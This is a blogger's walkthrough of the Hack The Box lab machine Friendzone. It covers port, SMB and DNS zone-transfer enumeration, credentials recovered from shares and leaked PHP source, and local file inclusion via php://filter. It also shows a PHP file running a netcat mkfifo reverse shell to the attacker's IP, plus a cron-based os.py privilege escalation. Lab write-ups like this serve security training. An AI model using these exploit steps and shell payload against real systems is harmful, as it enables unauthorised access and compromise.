This post is about the Walkthrough of the hackthebox machine: Friendzone
Hackthebox Friendzone Walkthrough Link to heading
Initial Enumeration Link to heading
Nmap Scan Link to heading
nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.123
sudo nmap -sU -p- -min-rate 10000 -Pn -oN alludp.txt 10.10.10.123
sudo nmap -p 21,22,53,80,139,443,445 -Pn -sC -sV -oN detailed.txt 10.10.10.123
sudo nmap -p 21,22,53,80,139,443,445 -script VULN 10.10.10.123
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-14 19:43 EST
Nmap scan report for 10.10.10.123
Host is up (0.059s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -39m58s, deviation: 1h09m16s, median: 0s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2022-02-15T02:43:23+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-02-15T00:43:23
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.38 seconds
─$ nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.123
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-14 19:28 EST
Nmap scan report for 10.10.10.123
Host is up (0.054s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 6.77 seconds
┌──(rocky㉿kali)-[~/hckbox/Friendzone]
└─$ sudo nmap -sU -p- -min-rate 10000 -Pn -oN alludp.txt 10.10.10.123
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-14 19:30 EST
Warning: 10.10.10.123 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.123
Host is up (0.054s latency).
Not shown: 65456 open|filtered ports, 78 closed ports
PORT STATE SERVICE
53/udp open domain
─$ sudo nmap -p 21,22,53,80,139,443,445 -script VULN 10.10.10.123
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-14 19:55 EST
Nmap scan report for 10.10.10.123
Host is up (0.052s latency).
PORT STATE SERVICE
21/tcp open ftp
|_sslv2-drown:
22/tcp open ssh
53/tcp open domain
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /wordpress/: Blog
|_ /robots.txt: Robots file
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open netbios-ssn
443/tcp open https
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_sslv2-drown:
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
Nmap done: 1 IP address (1 host up) scanned in 65.09 seconds
enum4linux 10.10.10.123
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Feb 14 19:57:09 2022
=========================================
| Share Enumeration on 10.10.10.123 |
=========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.10.123
//10.10.10.123/print$ Mapping: DENIED, Listing: N/A
//10.10.10.123/Files Mapping: DENIED, Listing: N/A
//10.10.10.123/general Mapping: OK, Listing: OK
//10.10.10.123/Development Mapping: OK, Listing: OK
//10.10.10.123/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
The Initial Enumeration has given lot of clues. i will explore on SMB as many shares and users are found. Then I will explore if any web based ( 80 and 443) can be used for backdoor.
$ sudo nmap -p 139,445 -script smb-enum-shares.nse 10.10.10.123
[sudo] password for rocky:
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-14 20:16 EST
Nmap scan report for 10.10.10.123
Host is up (0.052s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\hole
| Anonymous access: <none>
|  Current user access: <none>
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 13.89 seconds
smbmap -H 10.10.10.123 -R 1 ⨯
[+] Guest session IP: 10.10.10.123:445 Name: 10.10.10.123
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
.\general\*
dr--r--r-- 0 Wed Jan 16 15:10:51 2019 .
dr--r--r-- 0 Wed Jan 23 16:51:02 2019 ..
fr--r--r-- 57 Tue Oct 9 19:52:42 2018 creds.txt
Development READ, WRITE FriendZone Samba Server Files
.\Development\*
dr--r--r-- 0 Mon Feb 14 20:23:07 2022 .
dr--r--r-- 0 Wed Jan 23 16:51:02 2019 ..
fr--r--r-- 5493 Mon Feb 14 08:02:37 2022 a.php
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
smbclient \\\\10.10.10.123\\general 130 ⨯
Enter WORKGROUP\rocky's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 16 15:10:51 2019
.. D 0 Wed Jan 23 16:51:02 2019
creds.txt N 57 Tue Oct 9 19:52:42 2018
9221460 blocks of size 1024. 6455140 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> exit
┌──(rocky㉿kali)-[~/hckbox/Friendzone]
└─$ cat creds.txt
creds for the admin THING:
admin:WORKW******
We have got some credentails with username as admin. I am not sure this will be the administrator credentails. I am trying to see if there is web login page where i can apply these crdentials.
gobuster dir -u http://10.10.10.123 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.123
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/02/14 20:40:12 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 291]
/.htaccess (Status: 403) [Size: 296]
/.htpasswd (Status: 403) [Size: 296]
/index.html (Status: 200) [Size: 324]
/robots.txt (Status: 200) [Size: 13]
/server-status (Status: 403) [Size: 300]
/wordpress (Status: 301) [Size: 316] [--> http://10.10.10.123/wordpress/]
===============================================================
2022/02/14 20:40:37 Finished
dig axfr @10.10.10.123 1 ⨯
; <<>> DiG 9.16.15-Debian <<>> axfr @10.10.10.123
; (1 server found)
;; global options: +cmd
;; Query time: 51 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Mon Feb 14 23:53:16 EST 2022
;; MSG SIZE rcvd: 56
┌──(rocky㉿kali)-[~/hckbox/Friendzone]
└─$ dig axfr @10.10.10.123 friendzoneportal.red
; <<>> DiG 9.16.15-Debian <<>> axfr @10.10.10.123 friendzoneportal.red
; (1 server found)
;; global options: +cmd
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red. 604800 IN AAAA ::1
friendzoneportal.red. 604800 IN NS localhost.
friendzoneportal.red. 604800 IN A 127.0.0.1
admin.friendzoneportal.red. 604800 IN A 127.0.0.1
files.friendzoneportal.red. 604800 IN A 127.0.0.1
imports.friendzoneportal.red. 604800 IN A 127.0.0.1
vpn.friendzoneportal.red. 604800 IN A 127.0.0.1
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 51 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Mon Feb 14 23:53:40 EST 2022
;; XFR size: 9 records (messages 1, bytes 309)
$ dig axfr @10.10.10.123 friendzone.red
; <<>> DiG 9.16.15-Debian <<>> axfr @10.10.10.123 friendzone.red
; (1 server found)
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 55 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Tue Feb 15 00:23:59 EST 2022
;; XFR size: 8 records (messages 1, bytes 289)
Lets try accessing https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp
At this stage we have a below hints Link to heading
- Authenticated Adiministrator Dashboard
- Image upload url
- Image accessing format once uploaded.
gobuster dir -u https://administrator1.friendzone.red -w /usr/share/wordlists/dirb/common.txt -x php -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://administrator1.friendzone.red
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2022/02/15 19:16:22 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 309]
/.hta.php (Status: 403) [Size: 313]
/.htaccess (Status: 403) [Size: 314]
/.htpasswd.php (Status: 403) [Size: 318]
/.htaccess.php (Status: 403) [Size: 318]
/.htpasswd (Status: 403) [Size: 314]
/dashboard.php (Status: 200) [Size: 101]
/images (Status: 301) [Size: 349] [--> https://administrator1.friendzone.red/images/]
/index.html (Status: 200) [Size: 2873]
/login.php (Status: 200) [Size: 7]
/server-status (Status: 403) [Size: 318]
===============================================================
2022/02/15 19:17:13 Finished
i also remeber there was a development folder which we found during the smbclient enumeration. lets try to anonnymously login to developement folder via smbclinet and upload php reverse shell script.
How do i access this php file i uploaded. I remember the Developement folder was under /etc. This information was captured during the smb enumeration:
I tried calling it with different combination to access rev.php file. https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=../../../etc/development/rev It did not gave me reverse shell.
I decided to exploare the dashboard.php,login.php,upload.php to undersatnd the setup of website
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=login
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=upload
except the upload both( dashboard and login) gave me encrypted and i decoded with Burp.
dashboard
--
<?php
//echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
//echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";
echo "<title>FriendZone Admin !</title>";
$auth = $_COOKIE["FriendZoneAuth"];
if ($auth === "e7749d0f4b4da5d03e6e9196fd1d18f1"){
echo "<br><br><br>";
echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";
if(!isset($_GET["image_id"])){
echo "<br><br>";
echo "<center><p>image_name param is missed !</p></center>";
echo "<center><p>please enter it to show the image</p></center>";
echo "<center><p>default is image_id=a.jpg&pagename=timestamp</p></center>";
}else{
$image = $_GET["image_id"];
echo "<center><img src='images/$image'></center>";
echo "<center><h1>Something went worng ! , the script include wrong param !</h1></center>";
include($_GET["pagename"].".php");
//echo $_GET["pagename"];
}
}else{
echo "<center><p>You can't see the content ! , please login !</center></p>";
}
?>
--
Login
--
<?php
$username = $_POST["username"];
$password = $_POST["password"];
//echo $username === "admin";
//echo strcmp($username,"admin");
if ($username==="admin" and $password==="WORKWORKHhallelujah@#"){
setcookie("FriendZoneAuth", "e7749d0f4b4da5d03e6e9196fd1d18f1", time() + (86400 * 30)); // 86400 = 1 day
echo "Login Done ! visit /dashboard.php";
}else{
echo "Wrong !";
}
?>
However for upload.php it did not work. remeber the url which was used for upload.
Now it seems the upload.php is under the folder upload(/upload/upload.php)
Lets see the source code for upload.php using https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=../uploads/upload
<?php
// not finished yet -- friendzone admin !
if(isset($_POST["image"])){
echo "Uploaded successfully !<br>";
echo time()+3600;
}else{
echo "WHAT ARE YOU TRYING TO DO HOOOOOOMAN !";
}
?>
Its fake upload page.
Lets use the same smbclient to upload to Development folder. The php reverse shell did not work last time. Lets upload simple cmd.php file
smbclient //10.10.10.123/Development 1 ⨯
Enter WORKGROUP\rocky's password:
Try "help" to get a list of possible commands.
smb: \> put cmd.php rchitect.php
putting file cmd.php as \rchitect.php (0.7 kb/s) (average 0.7 kb/s)
smb: \> ls
. D 0 Wed Feb 16 04:00:14 2022
.. D 0 Wed Jan 23 16:51:02 2019
rchitect.php A 118 Wed Feb 16 04:00:14 2022
rev.php A 5493 Tue Feb 15 19:40:45 2022
9221460 blocks of size 1024. 6446420 blocks available
Used this code:
└─$ smbclient //10.10.10.123/Development
Enter WORKGROUP\rocky's password:
Try "help" to get a list of possible commands.
smb: \> put rev1.php
putting file rev1.php as \rev1.php (0.6 kb/s) (average 0.6 kb/s)
smb: \> exit
┌──(rocky㉿kali)-[~/hckbox/Friendzone]
└─$ cat rev1.php
<?php
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 1337 >/tmp/f');
?>
Called the php file like this:
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=../../../etc/Development/rev1
I got the reverse shell now
found the username from here
www-data@FriendZone:/var/www$ ls
ls
admin friendzoneportal html uploads
friendzone friendzoneportaladmin mysql_data.conf
www-data@FriendZone:/var/www$ cat mysql_data.conf
cat mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
I ran pspy to find the cron job running found something intresting
We dont have the permisson to edit the script
Lets try to edit the python OS module mentioned in script
we have a permission to edit the os.py
added this reverse shell scriot below os.py file
we are root now
